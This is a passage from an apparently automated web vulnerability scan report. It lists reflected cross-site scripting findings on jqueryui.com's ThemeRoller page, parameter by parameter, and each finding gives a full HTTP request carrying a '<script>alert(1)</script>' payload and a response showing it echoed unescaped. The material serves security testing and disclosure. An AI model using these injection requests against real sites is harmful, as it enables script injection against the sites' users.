GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb0de2"><script>alert(1)</script>ab3d44f3d57&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb0de2"><script>alert(1)</script>ab3d44f3d57&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

4.602. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cca57"><script>alert(1)</script>6ca0f80160 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngcca57"><script>alert(1)</script>6ca0f80160&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 119999

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngcca57"><script>alert(1)</script>6ca0f80160&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

4.603. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 338a7"><script>alert(1)</script>d2e8c6a5d6d was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png338a7"><script>alert(1)</script>d2e8c6a5d6d&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:02:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png338a7"><script>alert(1)</script>d2e8c6a5d6d&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

4.604. http://jqueryui.com/themeroller/ [bgTextureError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313a3"><script>alert(1)</script>7e95a01d9ea was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png313a3"><script>alert(1)</script>7e95a01d9ea&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png313a3"><script>alert(1)</script>7e95a01d9ea&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

4.605. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffca3"><script>alert(1)</script>afead0cc52e was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngffca3"><script>alert(1)</script>afead0cc52e&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngffca3"><script>alert(1)</script>afead0cc52e&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

4.606. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4afd"><script>alert(1)</script>5ee5c68dd88 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pnga4afd"><script>alert(1)</script>5ee5c68dd88&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pnga4afd"><script>alert(1)</script>5ee5c68dd88&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

4.607. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e499b"><script>alert(1)</script>612f13c5053 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnge499b"><script>alert(1)</script>612f13c5053&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnge499b"><script>alert(1)</script>612f13c5053&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

4.608. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f025"><script>alert(1)</script>0e1f745eeea was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png4f025"><script>alert(1)</script>0e1f745eeea&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png4f025"><script>alert(1)</script>0e1f745eeea&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

4.609. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d5c"><script>alert(1)</script>be656200160 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png89d5c"><script>alert(1)</script>be656200160&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png89d5c"><script>alert(1)</script>be656200160&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.610. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea5f3"><script>alert(1)</script>c758123b355 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaaea5f3"><script>alert(1)</script>c758123b355&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacit